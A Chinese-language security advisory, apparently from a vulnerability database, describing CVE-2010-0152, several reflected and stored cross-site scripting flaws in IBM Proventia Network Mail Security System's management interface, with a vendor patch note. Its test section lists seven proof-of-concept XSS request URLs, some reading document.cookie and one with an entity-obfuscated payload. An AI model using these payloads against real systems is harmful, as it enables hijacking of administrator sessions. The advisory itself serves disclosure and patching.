IBM PNMSS设备本地管理界面多个跨站脚本漏洞
发布日期:2010-09-15
更新日期:2010-09-17
受影响系统:IBM PNMSS < 2.5.0.2
不受影响系统:IBM PNMSS 2.5.0.2
描述:
CVE(CAN) ID:
CVE-2010-0152
Proventia网络邮件安全系统(PNMSS)用于对消息传输基础架构提供先行保护和垃圾邮件控制。
PNMSS的本地管理界面(LMI)中存在多个跨站脚本漏洞,远程攻击者可以通过向pvm_messagestore.php页面提交date1参数、向pvm_user_management.php页面提交userfilter参数、向sys_tools.php页面提交ping参数、向pvm_cert_commaction.php页面提交action参数、向pvm_cert_serveraction.php页面提交action参数、向pvm_smtpstore.php页面提交action参数或向sla/index.php页面提交l参数导致注入并执行恶意WEB脚本;此外还可以通过保存的搜索过滤器(Mail Security->Email Browser)执行存储式跨站脚本攻击。
<*来源:Marian Ventuneac (
marian.ventuneac@ul.ie)
链接:
http://secunia.com/advisories/41401/
http://www.ventuneac.net/security-advisories/MVSA-10-007
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
url_placeholder/pvm_messagestore.php?msgid=&sender=&rcpt=&subject=&meta=&mailsize=&folder=allfolders&date1=<script>alert('xss')</script>&date2=&s=mails&favname=
url_placeholder/pvm_user_management.php?userfilter=1%22+onblur%3D%22alert%28%27xss%27%29
url_placeholder/sys_tools.php?form=ping&page=sys_ping.php&ping=<script>alert(document.cookie)</script>
url_placeholder/pvm_cert_commaction.php?ajax=1&action=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76; %26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>
url_placeholder/pvm_cert_serveraction.php ?ajax=1&action=>"'><script>alert(document.cookie)</script>
url_placeholder/pvm_smtpstore.php?id=frozen&action="><script>alert("XSS")</script>
url_placeholder/sla/index.php?l="><script>alert(document.cookie)</script>
建议:
厂商补丁:
IBM
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.ers.ibm.com/浏览次数:2191
严重程度:0(网友投票)